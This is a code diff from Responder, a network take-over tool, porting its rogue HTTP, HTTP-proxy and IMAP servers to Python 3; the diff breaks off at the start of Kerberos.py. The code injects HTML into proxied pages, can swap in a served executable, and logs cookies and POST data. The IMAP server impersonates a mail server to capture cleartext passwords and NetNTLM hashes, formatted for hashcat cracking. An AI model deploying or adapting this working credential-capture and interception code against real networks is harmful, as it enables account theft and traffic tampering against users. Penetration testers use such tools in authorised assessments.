-			'user': ClearText_Auth.split(':')[0], 
-			'cleartext': ClearText_Auth.split(':')[1], 
-		})
+			'user': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[1], 
+			})
 
 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 			if settings.Config.Verbose:
-				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
 
 			return WPAD_Custom
 		else:
 			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 			Buffer.calculate()
-			return str(Buffer)
+			return Buffer
 	else:
 		if settings.Config.Basic:
-			Response = IIS_Basic_401_Ans()
+			r = IIS_Basic_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
-				print text("[HTTP] Sending BASIC authentication request to %s" % client)
+				print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
 
 		else:
-			Response = IIS_Auth_401_Ans()
+			r = IIS_Auth_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
-				print text("[HTTP] Sending NTLM authentication request to %s" % client)
+				print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
 
-		return str(Response)
+		return Response
 
 # HTTP Server class
 class HTTP(BaseRequestHandler):
@@ -267,46 +274,47 @@ class HTTP(BaseRequestHandler):
 	def handle(self):
 		try:
 			Challenge = RandomChallenge()
-			
 			while True:
 				self.request.settimeout(3)
 				remaining = 10*1024*1024 #setting max recieve size
 				data = ''
 				while True:
 					buff = ''
-					buff = self.request.recv(8092)
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
 					if buff == '':
 						break
 					data += buff
 					remaining -= len(buff)
-					if remaining <= 0:
-						break
 					#check if we recieved the full header
 					if data.find('\r\n\r\n') != -1: 
 						#we did, now to check if there was anything else in the request besides the header
 						if data.find('Content-Length') == -1:
 							#request contains only header
 							break
-					else:
-						#searching for that content-length field in the header
-						for line in data.split('\r\n'):
-							if line.find('Content-Length') != -1:
-								line = line.strip()
-								remaining = int(line.split(':')[1].strip()) - len(data)
-			
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
 				#now the data variable has the full request
 				Buffer = WpadCustom(data, self.client_address[0])
 
 				if Buffer and settings.Config.Force_WPAD_Auth == False:
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					self.request.close()
 					if settings.Config.Verbose:
-						print text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
+						print(text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0].replace("::ffff:","")))
 
 				else:
 					Buffer = PacketSequence(data,self.client_address[0], Challenge)
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 		
-		except socket.error:
+		except:
 			pass
 			
+

servers/HTTP_Proxy.py

@@ -14,13 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import urlparse
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	import urllib.parse as urlparse
+	import http.server as BaseHTTPServer
+else:
+	import urlparse
+	import BaseHTTPServer
+
 import select
 import zlib
-import BaseHTTPServer
-
 from servers.HTTP import RespondWithFile
-from utils import *
+
 
 IgnoredDomains = [ 'crl.comodoca.com', 'crl.usertrust.com', 'ocsp.comodoca.com', 'ocsp.usertrust.com', 'www.download.windowsupdate.com', 'crl.microsoft.com' ]
 
@@ -34,9 +39,9 @@ def InjectData(data, client, req_uri):
 	if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'):
 		return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri))
 
-	if len(data.split('\r\n\r\n')) > 1:
+	if len(data.split(b'\r\n\r\n')) > 1:
 		try:
-			Headers, Content = data.split('\r\n\r\n')
+			Headers, Content = data.split(b'\r\n\r\n')
 		except:
 			return data
 
@@ -44,30 +49,34 @@ def InjectData(data, client, req_uri):
 		if set(RedirectCodes) & set(Headers):
 			return data
 
-		if "content-encoding: gzip" in Headers.lower():
+		Len = b''.join(re.findall(b'(?<=Content-Length: )[^\r\n]*', Headers))
+
+		if b'content-encoding: gzip' in Headers.lower():
 			Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)
 
-		if "content-type: text/html" in Headers.lower():
+		if b'content-type: text/html' in Headers.lower():
 			if settings.Config.Serve_Html:  # Serve the custom HTML if needed
 				return RespondWithFile(client, settings.Config.Html_Filename)
 
-			Len = ''.join(re.findall(r'(?<=Content-Length: )[^\r\n]*', Headers))
-			HasBody = re.findall(r'(<body[^>]*>)', Content)
 
-			if HasBody and len(settings.Config.HtmlToInject) > 2:
+			HasBody = re.findall(b'(<body[^>]*>)', Content, re.IGNORECASE)
+
+			if HasBody and len(settings.Config.HtmlToInject) > 2 and not req_uri.endswith('.js'):
 				if settings.Config.Verbose:
-					print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))
+					print(text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1)))
 
-				Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HtmlToInject))
+				Content = Content.replace(HasBody[0], b'%s\n%s' % (HasBody[0], settings.Config.HtmlToInject.encode('latin-1')))
 
-		if "content-encoding: gzip" in Headers.lower():
+		if b'content-encoding: gzip' in Headers.lower():
 			Content = zlib.compress(Content)
 
-		Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))
-		data = Headers +'\r\n\r\n'+ Content
+		Headers = Headers.replace(b'Content-Length: '+Len, b'Content-Length: '+ NetworkSendBufferPython2or3(len(Content)))
+		data = Headers +b'\r\n\r\n'+ Content
+
 	else:
 		if settings.Config.Verbose:
-			print text("[PROXY] Returning unmodified HTTP response")
+			print(text("[PROXY] Returning unmodified HTTP response"))
+
 	return data
 
 class ProxySock:
@@ -99,14 +108,14 @@ class ProxySock:
 				# Replace the socket by a connection to the proxy
 				self.socket = socket.socket(family, socktype, proto)
 				self.socket.connect(sockaddr)
-			except socket.error, msg:
+			except socket.error as msg:
 				if self.socket:
 					self.socket.close()
 				self.socket = None
 				continue
 			break
 		if not self.socket :
-			raise socket.error, msg
+			raise socket.error(msg)
 		
 		# Ask him to create a tunnel connection to the target host/port
 		self.socket.send(
@@ -121,7 +130,7 @@ class ProxySock:
 		
 		# Not 200 ?
 		if parts[1] != "200":
-			print color("[!] Error response from upstream proxy: %s" % resp, 1)
+			print(color("[!] Error response from upstream proxy: %s" % resp, 1))
 			pass
 
 	# Wrap all methods of inner socket, without any change
@@ -198,9 +207,9 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 	rbufsize = 0
 
 	def handle(self):
-		(ip, port) =  self.client_address
+		(ip, port) =  self.client_address[0], self.client_address[1]
 		if settings.Config.Verbose:
-			print text("[PROXY] Received connection from %s" % self.client_address[0])
+			print(text("[PROXY] Received connection from %s" % self.client_address[0].replace("::ffff:","")))
 		self.__base_handle()
 
 	def _connect_to(self, netloc, soc):
@@ -210,7 +219,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 		else:
 			host_port = netloc, 80
 		try: soc.connect(host_port)
-		except socket.error, arg:
+		except socket.error as arg:
 			try: msg = arg[1]
 			except: msg = arg
 			self.send_error(404, msg)
@@ -237,14 +246,15 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 
 		try:
 			if self._connect_to(self.path, soc):
-				self.wfile.write(self.protocol_version +" 200 Connection established\r\n")
-				self.wfile.write("Proxy-agent: %s\r\n" % self.version_string())
-				self.wfile.write("\r\n")
+				self.wfile.write(NetworkSendBufferPython2or3(self.protocol_version +" 200 Connection established\r\n"))
+				self.wfile.write(NetworkSendBufferPython2or3("Proxy-agent: %s\r\n"% self.version_string()))
+				self.wfile.write(NetworkSendBufferPython2or3("\r\n"))
 				try:
 					self._read_write(soc, 300)
 				except:
 					pass
 		except:
+			raise
 			pass
 
 		finally:
@@ -271,14 +281,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 			URL_Unparse = urlparse.urlunparse(('', '', path, params, query, ''))
 
 			if self._connect_to(netloc, soc):
-				soc.send("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version))
+				soc.send(NetworkSendBufferPython2or3("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version)))
 
 				Cookie = self.headers['Cookie'] if "Cookie" in self.headers else ''
 
 				if settings.Config.Verbose:
-					print text("[PROXY] Client        : %s" % color(self.client_address[0], 3))
-					print text("[PROXY] Requested URL : %s" % color(self.path, 3))
-					print text("[PROXY] Cookie        : %s" % Cookie)
+					print(text("[PROXY] Client        : %s" % color(self.client_address[0].replace("::ffff:",""), 3)))
+					print(text("[PROXY] Requested URL : %s" % color(self.path, 3)))
+					print(text("[PROXY] Cookie        : %s" % Cookie))
 
 				self.headers['Connection'] = 'close'
 				del self.headers['Proxy-Connection']
@@ -286,8 +296,8 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 				del self.headers['Range']
 				
 				for k, v in self.headers.items():
-					soc.send("%s: %s\r\n" % (k.title(), v))
-				soc.send("\r\n")
+					soc.send(NetworkSendBufferPython2or3("%s: %s\r\n" % (k.title(), v)))
+				soc.send(NetworkSendBufferPython2or3("\r\n"))
 
 				try:
 					self._read_write(soc, netloc)
@@ -325,13 +335,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 						try:
 							data = i.recv(4096)
 
-							if self.command == "POST" and settings.Config.Verbose:
-								print text("[PROXY] POST Data     : %s" % data)
+							if self.command == b'POST' and settings.Config.Verbose:
+								print(text("[PROXY] POST Data     : %s" % data))
 						except:
 							pass
 					if data:
 						try:
 							out.send(data)
+
 							count = 0
 						except:
 							pass

servers/IMAP.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
+# email: lgaffie@secorizon.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
@@ -14,36 +14,610 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+import base64
+import re
+import struct
+import os
+import ssl
 from utils import *
-from SocketServer import BaseRequestHandler
+
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
 from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
 
 class IMAP(BaseRequestHandler):
+	def __init__(self, *args, **kwargs):
+		self.tls_enabled = False
+		BaseRequestHandler.__init__(self, *args, **kwargs)
+	
+	def upgrade_to_tls(self):
+		"""Upgrade connection to TLS using Responder's SSL certificates"""
+		try:
+			# Get SSL certificate paths from Responder config
+			cert_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			
+			if not os.path.exists(cert_path) or not os.path.exists(key_path):
+				if settings.Config.Verbose:
+					print(text('[IMAP] SSL certificates not found'))
+				return False
+			
+			# Create SSL context
+			context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+			context.load_cert_chain(cert_path, key_path)
+			
+			# Wrap socket
+			self.request = context.wrap_socket(self.request, server_side=True)
+			self.tls_enabled = True
+			
+			if settings.Config.Verbose:
+				print(text('[IMAP] Successfully upgraded to TLS from %s' % 
+					self.client_address[0].replace("::ffff:", "")))
+			
+			return True
+			
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[IMAP] TLS upgrade failed: %s' % str(e)))
+			return False
+	
+	def send_capability(self, tag="*"):
+		"""Send CAPABILITY response with STARTTLS if not already in TLS"""
+		if self.tls_enabled:
+			# After STARTTLS, don't advertise it again
+			self.request.send(NetworkSendBufferPython2or3(IMAPCapability()))
+		else:
+			# Before STARTTLS, advertise it
+			capability = "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN AUTH=LOGIN AUTH=NTLM STARTTLS\r\n"
+			self.request.send(NetworkSendBufferPython2or3(capability))
+		
+		if tag != "*":
+			self.request.send(NetworkSendBufferPython2or3(IMAPCapabilityEnd(Tag=tag)))
+	
 	def handle(self):
 		try:
-			self.request.send(str(IMAPGreeting()))
-			data = self.request.recv(1024)
-
-			if data[5:15] == "CAPABILITY":
-				RequestTag = data[0:4]
-				self.request.send(str(IMAPCapability()))
-				self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
+			# Send greeting
+			self.request.send(NetworkSendBufferPython2or3(IMAPGreeting()))
+			
+			# Main loop to handle multiple commands
+			while True:
 				data = self.request.recv(1024)
-
-			if data[5:10] == "LOGIN":
-				Credentials = data[10:].strip()
-
+				
+				if not data:
+					break
+				
+				# Handle CAPABILITY command
+				if b'CAPABILITY' in data.upper():
+					RequestTag = self.extract_tag(data)
+					self.send_capability(RequestTag)
+					continue
+				
+				# Handle STARTTLS command
+				if b'STARTTLS' in data.upper():
+					RequestTag = self.extract_tag(data)
+					
+					if self.tls_enabled:
+						# Already in TLS
+						response = "%s BAD STARTTLS already in TLS\r\n" % RequestTag
+						self.request.send(NetworkSendBufferPython2or3(response))
+						continue
+					
+					# Send OK response before upgrading
+					response = "%s OK Begin TLS negotiation now\r\n" % RequestTag
+					self.request.send(NetworkSendBufferPython2or3(response))
+					
+					# Upgrade to TLS
+					if not self.upgrade_to_tls():
+						# TLS upgrade failed, close connection
+						break
+					
+					# Continue handling commands over TLS
+					continue
+				
+				# Handle LOGIN command
+				if b'LOGIN' in data.upper():
+					success = self.handle_login(data)
+					if success:
+						break
+					continue
+				
+				# Handle AUTHENTICATE PLAIN
+				if b'AUTHENTICATE PLAIN' in data.upper():
+					success = self.handle_authenticate_plain(data)
+					if success:
+						break
+					continue
+				
+				# Handle AUTHENTICATE LOGIN
+				if b'AUTHENTICATE LOGIN' in data.upper():
+					success = self.handle_authenticate_login(data)
+					if success:
+						break
+					continue
+				
+				# Handle AUTHENTICATE NTLM
+				if b'AUTHENTICATE NTLM' in data.upper():
+					success = self.handle_authenticate_ntlm(data)
+					if success:
+						break
+					continue
+				
+				# Handle LOGOUT
+				if b'LOGOUT' in data.upper():
+					RequestTag = self.extract_tag(data)
+					response = "* BYE IMAP4 server logging out\r\n"
+					response += "%s OK LOGOUT completed\r\n" % RequestTag
+					self.request.send(NetworkSendBufferPython2or3(response))
+					break
+				
+				# Unknown command - send error
+				RequestTag = self.extract_tag(data)
+				response = "%s BAD Command not recognized\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[IMAP] Exception: %s' % str(e)))
+			pass
+	
+	def extract_tag(self, data):
+		"""Extract IMAP command tag (e.g., 'A001' from 'A001 LOGIN ...')"""
+		try:
+			parts = data.decode('latin-1', errors='ignore').split()
+			if parts:
+				return parts[0]
+		except:
+			pass
+		return "A001"
+	
+	def handle_login(self, data):
+		"""
+		Handle LOGIN command
+		Format: TAG LOGIN username password
+		Credentials can be quoted or unquoted
+		"""
+		try:
+			RequestTag = self.extract_tag(data)
+			
+			# Decode the data
+			data_str = data.decode('latin-1', errors='ignore').strip()
+			
+			# Remove tag and LOGIN command
+			# Pattern: TAG LOGIN credentials
+			login_match = re.search(r'LOGIN\s+(.+)', data_str, re.IGNORECASE)
+			if not login_match:
+				response = "%s BAD LOGIN command syntax error\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+			
+			credentials_part = login_match.group(1).strip()
+			
+			# Parse credentials - can be quoted or unquoted
+			username, password = self.parse_credentials(credentials_part)
+			
+			if username and password:
+				# Save credentials
 				SaveToDb({
 					'module': 'IMAP', 
 					'type': 'Cleartext', 
 					'client': self.client_address[0], 
-					'user': Credentials[0], 
-					'cleartext': Credentials[1], 
-					'fullhash': Credentials[0]+":"+Credentials[1],
+					'user': username, 
+					'cleartext': password, 
+					'fullhash': username + ":" + password,
 				})
+				
+				if settings.Config.Verbose:
+					print(text('[IMAP] LOGIN captured: %s:%s from %s' % (
+						username, password, self.client_address[0])))
+				
+				# Send success but then close
+				response = "%s OK LOGIN completed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return True
+			else:
+				# Invalid credentials format
+				response = "%s BAD LOGIN credentials format error\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+		
+		except Exception as e:
+			return False
+	
+	def parse_credentials(self, creds_str):
+		"""
+		Parse username and password from LOGIN command
+		Supports: "user" "pass", user pass, {5}user {8}password (literal strings)
+		"""
+		try:
+			# Method 1: Quoted strings "user" "pass"
+			quoted_match = re.findall(r'"([^"]*)"', creds_str)
+			if len(quoted_match) >= 2:
+				return quoted_match[0], quoted_match[1]
+			
+			# Method 2: Space-separated (unquoted)
+			parts = creds_str.split()
+			if len(parts) >= 2:
+				# Remove any curly brace literals {5}
+				user = re.sub(r'^\{\d+\}', '', parts[0])
+				passwd = re.sub(r'^\{\d+\}', '', parts[1])
+				return user, passwd
+			
+			return None, None
+		
+		except:
+			return None, None
+	
+	def handle_authenticate_plain(self, data):
+		"""Handle AUTHENTICATE PLAIN command - can be single-line or multi-line"""
+		try:
+			RequestTag = self.extract_tag(data)
+			data_str = data.decode('latin-1', errors='ignore').strip()
+			plain_match = re.search(r'AUTHENTICATE\s+PLAIN\s+(.+)', data_str, re.IGNORECASE)
+			
+			if plain_match:
+				b64_creds = plain_match.group(1).strip()
+			else:
+				response = "+\r\n"
+				self.request.send(NetworkSendBufferPython2or3(response))
+				cred_data = self.request.recv(1024)
+				if not cred_data:
+					return False
+				b64_creds = cred_data.decode('latin-1', errors='ignore').strip()
+			
+			try:
+				decoded = base64.b64decode(b64_creds).decode('latin-1', errors='ignore')
+				parts = decoded.split('\x00')
+				
+				if len(parts) >= 3:
+					username = parts[1]
+					password = parts[2]
+				elif len(parts) >= 2:
+					username = parts[0]
+					password = parts[1]
+				else:
+					raise ValueError("Invalid PLAIN format")
+				
+				if username and password:
+					SaveToDb({
+						'module': 'IMAP', 
+						'type': 'Cleartext', 
+						'client': self.client_address[0], 
+						'user': username, 
+						'cleartext': password, 
+						'fullhash': username + ":" + password,
+					})
+					
+					if settings.Config.Verbose:
+						print(text('[IMAP] AUTHENTICATE PLAIN captured: %s:%s from %s' % (
+							username, password, self.client_address[0])))
+					
+					response = "%s OK AUTHENTICATE completed\r\n" % RequestTag
+					self.request.send(NetworkSendBufferPython2or3(response))
+					return True
+			
+			except Exception as e:
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+		
+		except Exception as e:
+			return False
+	
+	def handle_authenticate_login(self, data):
+		"""Handle AUTHENTICATE LOGIN command - prompts for username, then password"""
+		try:
+			RequestTag = self.extract_tag(data)
+			
+			response = "+ " + base64.b64encode(b"Username:").decode('latin-1') + "\r\n"
+			self.request.send(NetworkSendBufferPython2or3(response))
+			
+			user_data = self.request.recv(1024)
+			if not user_data:
+				return False
+			
+			username_b64 = user_data.decode('latin-1', errors='ignore').strip()
+			username = base64.b64decode(username_b64).decode('latin-1', errors='ignore')
+			
+			response = "+ " + base64.b64encode(b"Password:").decode('latin-1') + "\r\n"
+			self.request.send(NetworkSendBufferPython2or3(response))
+			
+			pass_data = self.request.recv(1024)
+			if not pass_data:
+				return False
+			
+			password_b64 = pass_data.decode('latin-1', errors='ignore').strip()
+			password = base64.b64decode(password_b64).decode('latin-1', errors='ignore')
+			
+			if username and password:
+				SaveToDb({
+					'module': 'IMAP', 
+					'type': 'Cleartext', 
+					'client': self.client_address[0], 
+					'user': username, 
+					'cleartext': password, 
+					'fullhash': username + ":" + password,
+				})
+				
+				if settings.Config.Verbose:
+					print(text('[IMAP] AUTHENTICATE LOGIN captured: %s:%s from %s' % (
+						username, password, self.client_address[0])))
+				
+				response = "%s OK AUTHENTICATE completed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return True
+			else:
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+		
+		except Exception as e:
+			return False
+	
+	def handle_authenticate_ntlm(self, data):
+		"""Handle AUTHENTICATE NTLM command - implements challenge-response"""
+		try:
+			RequestTag = self.extract_tag(data)
+			
+			response = "+\r\n"
+			self.request.send(NetworkSendBufferPython2or3(response))
+			
+			type1_data = self.request.recv(2048)
+			if not type1_data:
+				return False
+			
+			type1_b64 = type1_data.decode('latin-1', errors='ignore').strip()
+			
+			try:
+				type1_msg = base64.b64decode(type1_b64)
+			except:
+				return False
+			
+			type2_msg = self.generate_ntlm_type2()
+			type2_b64 = base64.b64encode(type2_msg).decode('latin-1')
+			
+			response = "+ %s\r\n" % type2_b64
+			self.request.send(NetworkSendBufferPython2or3(response))
+			
+			type3_data = self.request.recv(4096)
+			if not type3_data:
+				return False
+			
+			type3_b64 = type3_data.decode('latin-1', errors='ignore').strip()
+			
+			if type3_b64 == '*' or type3_b64 == '':
+				if settings.Config.Verbose:
+					print(text('[IMAP] Client cancelled NTLM authentication'))
+				response = "%s NO AUTHENTICATE cancelled\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+			
+			if not all(c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\r\n' for c in type3_b64):
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+			
+			try:
+				type3_msg = base64.b64decode(type3_b64)
+			except Exception as e:
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+			
+			ntlm_hash = self.parse_ntlm_type3(type3_msg, type2_msg)
+			
+			if ntlm_hash:
+				if settings.Config.Verbose:
+					print(text('[IMAP] NTLM hash captured: %s from %s' % (
+						ntlm_hash['user'], self.client_address[0])))
+				
+				SaveToDb(ntlm_hash)
+				
+				response = "%s OK AUTHENTICATE completed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return True
+			else:
+				response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
+				self.request.send(NetworkSendBufferPython2or3(response))
+				return False
+		
+		except Exception as e:
+			return False
+	
+	def generate_ntlm_type2(self):
+		"""Generate NTLM Type 2 (Challenge) message with target info for NTLMv2"""
+		import time
+		
+		challenge = os.urandom(8)
+		self.ntlm_challenge = challenge
+		
+		target_name = b'W\x00O\x00R\x00K\x00G\x00R\x00O\x00U\x00P\x00'
+		target_name_len = len(target_name)
+		
+		target_info = b''
+		
+		domain_name = b'W\x00O\x00R\x00K\x00G\x00R\x00O\x00U\x00P\x00'
+		target_info += struct.pack('<HH', 0x0002, len(domain_name))
+		target_info += domain_name
+		
+		computer_name = b'S\x00E\x00R\x00V\x00E\x00R\x00'
+		target_info += struct.pack('<HH', 0x0001, len(computer_name))
+		target_info += computer_name
+		
+		dns_domain = b'w\x00o\x00r\x00k\x00g\x00r\x00o\x00u\x00p\x00'
+		target_info += struct.pack('<HH', 0x0004, len(dns_domain))
+		target_info += dns_domain
+		
+		dns_computer = b's\x00e\x00r\x00v\x00e\x00r\x00'
+		target_info += struct.pack('<HH', 0x0003, len(dns_computer))
+		target_info += dns_computer
+		
+		timestamp = int((time.time() + 11644473600) * 10000000)
+		target_info += struct.pack('<HH', 0x0007, 8)
+		target_info += struct.pack('<Q', timestamp)
+		
+		target_info += struct.pack('<HH', 0x0000, 0)
+		
+		target_info_len = len(target_info)
+		
+		target_name_offset = 48
+		target_info_offset = target_name_offset + target_name_len
+		
+		signature = b'NTLMSSP\x00'
+		msg_type = struct.pack('<I', 2)
+		
+		target_name_fields = struct.pack('<HHI', target_name_len, target_name_len, target_name_offset)
+		
+		flags = b'\x05\x02\x81\xa2'
+		
+		context = b'\x00' * 8
+		
+		target_info_fields = struct.pack('<HHI', target_info_len, target_info_len, target_info_offset)
+		
+		type2_msg = (signature + msg_type + target_name_fields + flags + 
+					 challenge + context + target_info_fields + target_name + target_info)
+		
+		return type2_msg
+	
+	def parse_ntlm_type3(self, type3_msg, type2_msg):
+		"""Parse NTLM Type 3 (Authenticate) message and extract NetNTLMv2 hash"""
+		try:
+			from binascii import hexlify
+			
+			if type3_msg[:8] != b'NTLMSSP\x00':
+				return None
+			
+			msg_type = struct.unpack('<I', type3_msg[8:12])[0]
+			if msg_type != 3:
+				return None
+			
+			lm_len, lm_maxlen, lm_offset = struct.unpack('<HHI', type3_msg[12:20])
+			ntlm_len, ntlm_maxlen, ntlm_offset = struct.unpack('<HHI', type3_msg[20:28])
+			domain_len, domain_maxlen, domain_offset = struct.unpack('<HHI', type3_msg[28:36])
+			user_len, user_maxlen, user_offset = struct.unpack('<HHI', type3_msg[36:44])
+			ws_len, ws_maxlen, ws_offset = struct.unpack('<HHI', type3_msg[44:52])
+			
+			if user_offset + user_len <= len(type3_msg):
+				user = type3_msg[user_offset:user_offset+user_len].decode('utf-16le', errors='ignore')
+			else:
+				user = "unknown"
+			
+			if domain_offset + domain_len <= len(type3_msg):
+				domain = type3_msg[domain_offset:domain_offset+domain_len].decode('utf-16le', errors='ignore')
+			else:
+				domain = ""
+			
+			if ntlm_offset + ntlm_len <= len(type3_msg):
+				ntlm_response = type3_msg[ntlm_offset:ntlm_offset+ntlm_len]
+			else:
+				return None
+			
+			if len(ntlm_response) > 24:
+				ntlmv2_response = ntlm_response[:16]
+				ntlmv2_blob = ntlm_response[16:]
+				
+				challenge = type2_msg[24:32]
+				
+				hash_str = "%s::%s:%s:%s:%s" % (
+					user,
+					domain,
+					hexlify(challenge).decode(),
+					hexlify(ntlmv2_response).decode(),
+					hexlify(ntlmv2_blob).decode()
+				)
+				
+				if settings.Config.Verbose:
+					print(text('[IMAP] NetNTLMv2 hash format (hashcat -m 5600)'))
+				
+				return {
+					'module': 'IMAP',
+					'type': 'NetNTLMv2',
+					'client': self.client_address[0],
+					'user': user,
+					'domain': domain,
+					'hash': hash_str,
+					'fullhash': hash_str
+				}
+			else:
+				ntlm_hash = ntlm_response[:24]
+				challenge = type2_msg[24:32]
+				
+				if lm_offset + lm_len <= len(type3_msg) and lm_len == 24:
+					lm_hash = type3_msg[lm_offset:lm_offset+lm_len]
+				else:
+					lm_hash = b'\x00' * 24
+				
+				hash_str = "%s::%s:%s:%s:%s" % (
+					user,
+					domain,
+					hexlify(lm_hash).decode(),
+					hexlify(ntlm_hash).decode(),
+					hexlify(challenge).decode()
+				)
+				
+				if settings.Config.Verbose:
+					print(text('[IMAP] NetNTLMv1 hash format (hashcat -m 5500)'))
+				
+				return {
+					'module': 'IMAP',
+					'type': 'NetNTLMv1',
+					'client': self.client_address[0],
+					'user': user,
+					'domain': domain,
+					'hash': hash_str,
+					'fullhash': hash_str
+				}
+		
+		except Exception as e:
+			return None
 
-				## FIXME: Close connection properly
-				## self.request.send(str(ditchthisconnection()))
-				## data = self.request.recv(1024)
-		except Exception:
-			pass
+class IMAPS(IMAP):
+	"""IMAP over SSL (port 993) - SSL wrapper that inherits from IMAP"""
+	
+	def setup(self):
+		"""Setup SSL socket before handling - called automatically by SocketServer"""
+		try:
+			# Get SSL certificate paths from Responder config
+			cert_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			
+			if not os.path.exists(cert_path) or not os.path.exists(key_path):
+				if settings.Config.Verbose:
+					print(text('[IMAPS] SSL certificates not found'))
+				self.request.close()
+				return
+			
+			# Create SSL context
+			context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+			context.load_cert_chain(cert_path, key_path)
+			
+			# Wrap socket in SSL before IMAP handles it
+			self.request = context.wrap_socket(self.request, server_side=True)
+			
+			# Mark as already in TLS so STARTTLS isn't advertised
+			self.tls_enabled = True
+			
+			if settings.Config.Verbose:
+				print(text('[IMAPS] SSL connection from %s' % 
+					self.client_address[0].replace("::ffff:", "")))
+			
+		except ssl.SSLError as e:
+			# Client rejected self-signed cert - suppress expected errors
+			if 'ALERT_BAD_CERTIFICATE' not in str(e) and settings.Config.Verbose:
+				print(text('[IMAPS] SSL handshake failed: %s' % str(e)))
+			try:
+				self.request.close()
+			except:
+				pass
+		except Exception as e:
+			if 'Bad file descriptor' not in str(e) and settings.Config.Verbose:
+				print(text('[IMAPS] SSL setup error: %s' % str(e)))
+			try:
+				self.request.close()
+			except:
+				pass
+	
+	# handle() method is inherited from IMAP class - no need to override!

servers/Kerberos.py

@@ -14,126 +14,870 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from utils import *
+import codecs
 import struct
+import time
+from utils import *
 
-def ParseMSKerbv5TCP(Data):
-	MsgType     = Data[21:22]
-	EncType     = Data[43:44]
-	MessageType = Data[32:33]
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 
-	if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
